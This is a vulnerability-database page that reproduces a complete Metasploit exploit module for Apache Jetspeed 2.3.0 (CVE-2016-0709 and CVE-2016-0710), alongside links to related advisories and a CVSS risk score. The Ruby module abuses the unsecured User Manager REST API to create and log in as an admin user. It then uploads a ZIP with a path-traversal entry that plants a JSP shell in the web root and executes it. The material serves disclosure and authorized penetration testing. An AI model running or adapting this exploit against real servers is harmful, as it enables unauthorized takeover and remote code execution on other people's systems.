Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Jetspeed Arbitrary File Upload

🗓️ 24 Mar 2016 00:22:32Reported by Andreas Lindh, wvu <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 52 Views

Apache Jetspeed Arbitrary File Upload via Unsecured User Manager REST API and ZIP Path Traversal to Execute Shell

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Apache Jetspeed - Arbitrary File Upload (Metasploit)
31 Mar 201600:00
zdt
IBM Security Bulletins		Security Bulletin: Multiple Security Vulnerabilities in Jetspeed Affect IBM Sterling B2B Integrator
5 Feb 202000:53
ibm
Tenable Nessus		Apache Jetspeed User Manager Service SQLi
28 Mar 201600:00
nessus
Circl		CVE-2016-0709
31 Mar 201600:00
circl
Circl		CVE-2016-0710
31 Mar 201600:00
circl
CNVD		Apache Jetspeed Directory Traversal Vulnerability
9 Mar 201600:00
cnvd
CNVD		Apache Jetspeed User Management REST API Unauthorized Access Vulnerability
9 Mar 201600:00
cnvd
Check Point Advisories		Apache Jetspeed SQL Injection (CVE-2016-0710)
18 Apr 201600:00
checkpoint_advisories
Check Point Advisories		Apache Jetspeed Remote Code Execution (CVE-2016-0709)
18 Apr 201600:00
checkpoint_advisories
CVE		CVE-2016-0709
11 Apr 201614:00
cve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Jetspeed Arbitrary File Upload',
      'Description'    => %q{
        This module exploits the unsecured User Manager REST API and a ZIP file
        path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier
        versions, to upload and execute a shell.

        Note: this exploit will create, use, and then delete a new admin user.

        Warning: in testing, exploiting the file upload clobbered the web
        interface beyond repair. No workaround has been found yet. Use this
        module at your own risk. No check will be implemented.
      },
      'Author'         => [
        'Andreas Lindh', # Vulnerability discovery
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2016-0710'],
        ['CVE', '2016-0709'],
        ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
      ],
      'DisclosureDate' => '2016-03-06',
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux', 'win'],
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Apache Jetspeed <= 2.3.0 (Linux)',   'Platform' => 'linux'],
        ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      Opt::RPORT(8080)
    ])
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_warning(msg='')
    super("#{peer} - #{msg}")
  end

  def exploit
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user
    print_status('Logging in as newly created admin')
    jetspeed_login
    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip
    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
    exec_jsp_shell
  end

  def cleanup
    print_status("Deleting user: #{username}")
    delete_user
    super
  end

  #
  # Exploit methods
  #

  def create_admin_user
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => '/jetspeed/services/usermanager/users',
      'vars_post' => {
        'name'             => username,
        'password'         => password,
        'password_confirm' => password
      }
    )
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/jetspeed/services/usermanager/users/#{username}",
      'vars_post' => {
        'user_enabled' => 'true',
        'roles'        => 'admin'
      }
    )
  end

  def jetspeed_login
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/login/redirector'
    )

    res = send_request_cgi!(
      'method'    => 'POST',
      'uri'       => '/jetspeed/login/j_security_check',
      'cookie'    => res.get_cookies,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password
      }
    )

    @cookie = res.get_cookies
  end

  # Let's pretend we're mechanize
  def import_file
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/portal/Administrative/site.psml',
      'cookie' => @cookie
    )

    html = res.get_html_document
    import_export = html.at('//a[*//text() = "Import/Export"]/@href')

    res = send_request_cgi!(
      'method' => 'POST',
      'uri'    => import_export,
      'cookie' => @cookie
    )

    html = res.get_html_document
    html.at('//form[*//text() = "Import File"]/@action')
  end

  def upload_payload_zip
    zip = Rex::Zip::Archive.new
    zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)

    mime = Rex::MIME::Message.new
    mime.add_part(zip.pack, 'application/zip', 'binary',
                  %Q{form-data; name="fileInput"; filename="#{zip_filename}"})
    mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
    mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')

    case target['Platform']
    when 'linux'
      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
      register_dir_for_cleanup("../temp/#{username}")
    when 'win'
      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
      register_dir_for_cleanup("..\\temp\\#{username}")
    end

    send_request_cgi(
      'method' => 'POST',
      'uri'    => import_file,
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'cookie' => @cookie,
      'data'   => mime.to_s
    )
  end

  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/jetspeed/#{jsp_filename}",
      'cookie' => @cookie
    )
  end

  #
  # Cleanup methods
  #

  def delete_user
    send_request_cgi(
      'method' => 'DELETE',
      'uri'    => "/jetspeed/services/usermanager/users/#{username}"
    )
  end

  #
  # Utility methods
  #

  def username
    @username ||= Rex::Text.rand_text_alpha_lower(8)
  end

  def password
    @password ||= Rex::Text.rand_text_alphanumeric(8)
  end

  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end

  def zip_filename
    @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2019 17:32Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 38.8
EPSS0.77495
apache jetspeedarbitrary file uploaduser managerrest apipath traversalshell execution
52